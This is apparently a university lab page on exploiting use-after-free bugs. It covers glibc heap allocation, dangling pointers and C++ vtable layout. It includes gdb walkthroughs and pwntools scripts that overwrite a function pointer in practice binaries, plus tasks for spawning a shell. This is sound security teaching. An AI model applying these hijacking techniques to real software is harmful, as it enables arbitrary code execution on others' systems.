Lab 10 - Use After Free

Introduction

Use-after-free refers to a class of bugs in which the data from a memory region is still used after the region is freed. The most common causes of use-after-free bugs are:

  • Wrongly handled error conditions
  • Unaccounted for program states
  • Confusion over which part of the program is responsible for freeing the memory

Such bugs can have various adverse consequences:

  • crashes
  • corruption of valid data
  • arbitrary code execution

An use-after-free bug is exploitable if the program can be brought in a state in which it can allocate memory over the freed area. This gives the attacker control over what data is accessed after the free.

In terms of function calls on a Linux system, as attackers, we need to force a malloc of the same or similar size after the free. In the correct circumstances the subsequent malloc will return the same pointer as the previous call (or a pointer to a region that overlaps the previous one).

Heap Allocation

The standard method of allocating/freeing memory in a Linux C program is by using the malloc/free C library functions. Equivalently the C++ primitives are new and delete. The difference between malloc/free and new/delete is that new and delete, in addition to memory allocation, also call the associated constructor/destructor of the allocated type.

The innards of malloc aren't trivial to understand so we will work with more of a general overview of what it does and how can we predict what it will do so we can create a repeatable exploit.

The first thing worth mentioning is that not all addresses returned by malloc reside in what we call the heap.

malloc has 2 ways of allocating memory:

  • on the heap
    • a memory region in continuation of .data which can be resized with the brk and sbrk system calls
    • for small sizes (default is < 128 KB)
  • in the mmap region
    • above the stack and shared library zones generally, done using the mmap system call
    • for large sizes (default is > 128 KB)

The 2 regions can be seen below in red and green respectively:

When dealing with structures allocated on the heap we shouldn't dwell too much with the mmap case; most of the times structures and classes are in the range of 10's or 100's of bytes.

The minimum allocation size is 4 * ptr_size (16 for 32-bit and 32 for 64-bit). Even if calling malloc(0) it will return a valid pointer to a region of minimum size.

The internal size (real size) is stored in memory immediately before the buffer returned by malloc. You can access it doing some C magic:

void* ptr = malloc(100);
unsigned long size = ((unsigned long*)ptr)[-1] & ~7;

The & ~7 is added to 0 out the last 3 bits which are actually flags and not part of the size. These bits are:

  • bit 0 - PREV_INUSE - This bit is set when previous chunk is allocated.
  • bit 1 - IS_MMAPPED - This bit is set when chunk is mmap’d.
  • bit 2 - NON_MAIN_ARENA - This bit is set when this chunk belongs to a thread arena.

When allocating on the heap malloc uses various other methods of allocating small data regions (arena based allocation with multiple bins of different sizes):

  • Fast bins
  • Unsorted bins
  • Small bins
  • Large bins

Check Understanding glibc malloc for more details.

Use the program from 00-malloc-addr to see how malloc manifests for different sizes. The program does pairs of malloc + free to inspect for what range of sizes will the returned pointer be the same. It also does the trick from the note above to take the real size and the flags.

Example output:

$ ./malloc_addr
Range [1, 504] with jump of 1:
Addr: 0x93b2a0; Size: 24 B; Internal size: 32 B; Count = 24
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
Addr: 0x93b2c0; Size: 40 B; Internal size: 48 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
Addr: 0x93b2f0; Size: 56 B; Internal size: 64 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
...
Addr: 0x93d190; Size: 504 B; Internal size: 512 B; Count = 16
prev_inuse = 1; is_mmaped = 0; non_main_arena = 0
 
Range [33554432, 33619967] with jump of 1024:
Addr: 0x7f67090a5010; Size: 32 MB; Internal size: 32 MB; Count = 4
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
...
Addr: 0x7f6709096010; Size: 32 MB; Internal size: 32 MB; Count = 4
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
 
Range [33554432, 33619967] with jump of 4096:
Addr: 0x7f67090a5010; Size: 32 MB; Internal size: 32 MB; Count = 1
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0
...
Addr: 0x7f6709096010; Size: 32 MB; Internal size: 32 MB; Count = 1
prev_inuse = 0; is_mmaped = 1; non_main_arena = 0

What to look for:

  • internal size > size sent to malloc
  • internal size is at least size sent to malloc + 8 (the hidden size value)
  • for [0, 32] (internal) bytes the address will fall in the same place
  • for [32+16*k+1, 32+16*k+16] (internal) bytes the address will fall in the same place
  • for large sizes the is_mmaped bit is set
  • for large sizes, if the size is in the range of [x, x+PAGE_SIZE] it will fall in the same place

For a in-depth understanding of how malloc works check:

Dangling Pointers

A dangling pointer is a pointer variable through which the freed memory is accessed. For example:

char* p = malloc(100); // memory allocated, p is valid
free(p); // p is freed
puts(p); // when puts is called p is a dangling pointer

When building an exploit based on an use-after-free bug the most important aspect is the data type of the underlying dangling pointer/s. This determines how the attacker injected data is interpreted. If the data structure doesn't influence the control flow of the program then it is not exploitable.

When checking for use-after-free bugs we should also check what heap data points to code or is used in conditional statements (affects the control flow of the program).

struct a {
    int x;
    int y;
};
 
struct b {
    int id;
    void (*foo)(void);
};
 
...
struct a* a;
struct b* b;
...
printf("%d %d\n", a->x, a->y);
...
b->foo();

Out of the 2 structures above we should aim to create a dangling pointer of type struct b because it contains a code pointer.

Tutorial

Enter the 00-c-tutorial/ directory and check the source code for bugs.

We can see that in the default case of the switch the object is freed but the program continues:

...
default:
    printf("Invalid command\n");
    free(p);
...

The post_action_msg buffer is conveniently allocated to a size similar to that of struct person and fgets is used to read something in the newly allocated buffer.

We also notice the members of struct person:

struct person {
    void (*action_func)(struct person*); // ԅ(≖‿≖ԅ)
    char name[32];
};

It contains a code pointer which we can overwrite in our exploit.

First lets validate that both calls to malloc return the same address. The returned address should be in the $rax register after the call.

   0x4011c8 <main+4>:   sub    rsp,0x20
   0x4011cc <main+8>:   mov    edi,0x28
   0x4011d1 <main+13>:  call   0x401090 <malloc@plt>
=> 0x4011d6 <main+18>:  mov    QWORD PTR [rbp-0x10],rax
...
gdb-peda$ p/x $rax
$1 = 0x4052a0

Give the program appropriate input so that it reaches the default case. In the following example I send random_name to the first fgets and 3 (which is an invalid case) to fgetc.

...
   0x401209 <main+69>:  mov    esi,0x20
   0x40120e <main+74>:  mov    rdi,rcx
=> 0x401211 <main+77>:  call   0x401080 <fgets@plt>
gdb-peda$
random_name
 
...
   0x401257 <main+147>: mov    rax,QWORD PTR [rip+0x2e02]        # 0x404060 <stdin@@GLIBC_2.2.5>
   0x40125e <main+154>: mov    rdi,rax
=> 0x401261 <main+157>: call   0x401070 <fgetc@plt>
gdb-peda$
3

Eventually we reach the call to free.

...
   0x4012b7 <main+243>: mov    rax,QWORD PTR [rbp-0x10]
   0x4012bb <main+247>: mov    rdi,rax
=> 0x4012be <main+250>: call   0x401030 <free@plt>

We see that the second malloc returns the same address.

...
   0x4012c3 <main+255>: mov    edi,0x28
   0x4012c8 <main+260>: call   0x401090 <malloc@plt>
=> 0x4012cd <main+265>: mov    QWORD PTR [rbp-0x8],rax
gdb-peda$ p/x $rax
$2 = 0x4052a0

Send some random input to fgets to overwrite the function pointer.

   0x4012e8 <main+292>: mov    esi,0x28
   0x4012ed <main+297>: mov    rdi,rax
=> 0x4012f0 <main+300>: call   0x401080 <fgets@plt>
gdb-peda$
AAAAAAAA

Afterward we reach the following code where it tries to call rdx. If we print its value we see that its value coincides with the 8 bytes read with the previous fgets.

   0x4012fc <main+312>: mov    rax,QWORD PTR [rbp-0x10]
   0x401300 <main+316>: mov    rdi,rax
=> 0x401303 <main+319>: call   rdx
gdb-peda$ p/x $rdx
$3 = 0x4141414141414141

Put it all together and replace “AAAAAAAA” with the address of bad_func to create an appropriate exploit. Pwntool code below:

from pwn import *
 
elf = ELF('./c_tut')
io = process('./c_tut')
io.sendline("name")
io.sendline("3")
io.sendline(p64(elf.symbols['bad_func']))
 
io.interactive()

Virtual Function Tables

Though function pointers inside structures in C code seem a bit esoteric, in object oriented languages (like C++) they are standard practice but overlooked due to the added layers of abstraction. Most of the times C programs that use these kinds of structures try to emulate an object oriented style.

In object oriented languages virtual method tables (or virtual function tables) are used to facilitate polymorphism and inheritance. An object will contain a pointer to a list of functions (only the virtual ones) so that it maintains the methods of its type even if cast to another one upper in the inheritance tree.

C++ objects memory layout

class B {
  int a, b;
public:
  virtual void f(void);
};
 
class B1 {
  int x, y;
public:
  virtual void z(void);
};
 
class D: public B, public B1 {
  int c, d;
public:
  void f(void);
  void z(void);
};
 
int main()
{
  D objD; B1 * ptrB1;
  ptrB1 = &objD;
  ptrB1->z();
}

We can see in the example below how the structure of a C++ objects looks like. The object is a compound of its parents' members and its own. As class D overrides both virtual functions f and z the virtual tables inside of D will contain its own methods.

When doing an upcast (cast to a parent class) the pointer is just offset to the correct subobject (e.g.: when casting to B1 ptrB1 will start from PVTable1).

When doing multiple inheritance there is no specific order of the subobjects inside the object.

We can also use the compiler to see the data layout. Copy the code above into a file dummy.cpp.

Then run:

$ clang -cc1 -fdump-record-layouts dummy.cpp
 
*** Dumping AST Record Layout
         0 | class B
         0 |   (B vtable pointer)
         8 |   int a
        12 |   int b
           | [sizeof=16, dsize=16, align=8,
           |  nvsize=16, nvalign=8]
 
*** Dumping AST Record Layout
         0 | class B1
         0 |   (B1 vtable pointer)
         8 |   int x
        12 |   int y
           | [sizeof=16, dsize=16, align=8,
           |  nvsize=16, nvalign=8]
 
*** Dumping AST Record Layout
         0 | class D
         0 |   class B (primary base)
         0 |     (B vtable pointer)
         8 |     int a
        12 |     int b
        16 |   class B1 (base)
        16 |     (B1 vtable pointer)
        24 |     int x
        28 |     int y
        32 |   int c
        36 |   int d
           | [sizeof=40, dsize=40, align=8,
           |  nvsize=40, nvalign=8]

Tutorial

Go to the 00-cpp-tutorial/ directory and look at the source code.

The bug is related to an error check prematurely deleting the object:

A *a = new A(x);
 
if (x < 0)
    delete a;  // <- pointer is deleted
...
std::cout << header << ":" << a->negate() << "\n"; <- object still used

Before calling the object method a new buffer is allocated and read:

char *header = new char[16];
std::cin.getline(header, 16);

Remember that virtual functions exist in a virtual function table so we not only need the address of a target function to call, but also the address of an array containing the function address.

Luckily the program already provides an array containing bad_func:

void (*func_list[3])(uint64_t) = { bad_func };

Remember that non-static class methods take an implicit this argument:

class Foo {
    void bar(int x, int y);
};

Here the bar method takes 3 arguments. Translated to C:

struct Foo {
    void (*bar)(struct Foo*, int, int);
};

Lets check how the method call is done in assembly:

   ...
   0x0000000000401259 <+92>:    mov    rdi,rbx                  <- first arg (this)
   0x000000000040125c <+95>:    call   0x40138c <A::A(int)>     <- constructor
   0x0000000000401261 <+100>:   mov    QWORD PTR [rbp-0x28],rbx <- pointer stored on stack
   ...
   0x00000000004012e2 <+229>:   mov    rax,QWORD PTR [rbp-0x28] <- get pointer from stack
   0x00000000004012e6 <+233>:   mov    rax,QWORD PTR [rax]      <- get VFT (offset 0 in class)
   0x00000000004012e9 <+236>:   mov    rdx,QWORD PTR [rax]      <- get VFT[0] (negate method)
   0x00000000004012ec <+239>:   mov    rax,QWORD PTR [rbp-0x28] <- get pointer from stack
   0x00000000004012f0 <+243>:   mov    rdi,rax                  <- first arg (this)
   0x00000000004012f3 <+246>:   call   rdx                      <- call negate(this)
   ...

Like in the C tutorial, check that the second malloc returns the same address (if we input -1 so the object is deleted):

gdb-peda$ b *0x401251
gdb-peda$ c
Continuing.
Enter a number: -1
    ...
   0x40124c <main+79>:  call   0x401090 <operator new(unsigned long)@plt>
=> 0x401251 <main+84>:  mov    rbx,rax
gdb-peda$ p/x $rax
$1 = 0x4176d0
gdb-peda$ b *0x4012a1
gdb-peda$ c
    ...
   0x40129c <main+159>: call   0x401030 <operator new[](unsigned long)@plt>
=> 0x4012a1 <main+164>: mov    QWORD PTR [rbp-0x20],rax
gdb-peda$ p/x $rax
$2 = 0x4176d0

Use the following script to get the program to call bad_func:

from pwn import *
 
elf = ELF('./cpp_tut')
io = process('./cpp_tut')
io.sendline("-1")
io.sendline(p64(elf.symbols['func_list']))
 
io.interactive()

Output:

$ python2 exploit.py
[*] '/home/student/cns/10-UAF/00-cpp-tutorial/cpp_tut'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './cpp_tut': pid 29763
[*] Switching to interactive mode
[*] Process './cpp_tut' stopped with exit code 0 (pid 29763)
Enter a number:Read a header:\x90@@:Your 'this' pointer = 0x15c72d0
32

Tasks

All content necessary for the CNS laboratory tasks can be found in the CNS public repository.

List Printer - C++

Go to the 01-list-printer/ directory and examine the code/binary to find the use-after-free bug. Create an exploit to run a shell.

Point - C

Go to the 02-point/ directory and examine the code/binary to find the use-after-free bug. Create an exploit to run system(“sh”)

The program never checks if the id corresponds to an existing point.

Look at the structs, how would a struct point3D overlap over a struct point2D?

       point2D               point3D
  +---------------+     +---------------+
  |   x   |   y   |     |   x   |   y   |
  +---------------+     +---------------+
  |  vector_len   |     |   z   |   0   |
  +---------------+     +---------------+
                        |  vector_len   |
                        +---------------+

If we check the address of system@plt it should have 3 non-0 bytes so it can be overwritten with the value of z.

gdb-peda$ info address system@plt
Symbol "system@plt" is at 0x401070 in a file compiled without debugging.

How to send the “sh” argument to system?

The function will be called with a pointer to the structure itself:

point_list_2d[id]->vector_len(point_list_2d[id]));

Lets pretend the pointer is casted to char*. The string will be formed out of the concatenated raw bytes of the structure (until \x00). It should be enough to set x to “sh\x00\x00” unpacked.

Resources

cns/labs/lab-10.txt · Last modified: 2021/01/11 16:59 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0